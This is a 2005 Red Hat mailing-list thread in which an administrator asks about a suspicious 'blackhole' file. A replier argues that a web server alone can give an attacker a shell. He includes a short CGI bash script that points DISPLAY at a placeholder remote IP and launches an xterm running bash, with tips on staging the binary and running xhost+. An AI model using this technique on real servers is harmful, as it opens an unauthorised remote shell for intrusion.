Blackhole

Tobias Speckbacher TSpeckbacher at quova.com
Mon Apr 11 19:16:13 UTC 2005 


> -----Original Message-----
> From: redhat-list-bounces at redhat.com [mailto:redhat-list-
> bounces at redhat.com] On Behalf Of Chris Kenward
> Sent: Monday, April 11, 2005 8:15 AM
> To: 'General Red Hat Linux discussion list'
> Subject: RE: Blackhole
> 
> Hi there, Tom
> 
> > Is it possible that you have some shell accounts on your system
> > and that one of your users is trying to run this?  The C code by
> > itself won't harm anything, and from what you say, it does not
> > appear to have been compiled.  Perhaps just upgrading to the newest
> > apache will fix?  Looking at the links provided below seem to
> > indicate that the executable must be run, to try to break the apache
> > server through the listed port.  I've seen this attempt many times
> > on my machine, & AFAIK, it's never been successful.
> 
> I don't think anyone local to the machine would do something like that
-
> we
> only allow FTP access to the server and no users have telnet or SSH
> access.

Shell access is not necessary, the web server itself essentially can
serve as a shell.  Easy enough to write a cgi script to execute all the
commands necessary.

Hell, even getting a shell is trivial:

First we grab an xterm binary from a compatible system, and drop it
wherever we have access to, set permissions yada yada yada.  Unless of
course the admin was kind enough to install it for us, which I have seen
plenty of times.

We will name the following script xterm.cgi or whatever extensions you
have set to execute and drop it into my web sites cgi-bin directory.
Of course this will not work if the web server is properly firewalled,
which in my experience they hardly ever are.

#!/bin/bash

export DISPLAY=xxx.xxx.xxx.xxx:0.0
/tmp/xterm -e /bin/bash

If you try this don't forget to add the host to your X-Servers acl or
simply run xhost+.

A web server will let you just about do anything you want ...

-Tobias


> 
> The Apache web server is latest version from the RHN (2.0?)
> 
> I've taken the bull by the proverbials and deleted the file called
> "blackhole". Can't find anything else suspicious and looking through
the
> various ports that are active doesn't really show anything suspicious.
> 
> Whew?
> 
> Regards
> Chris
> 
> 
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list

More information about the redhat-list mailing list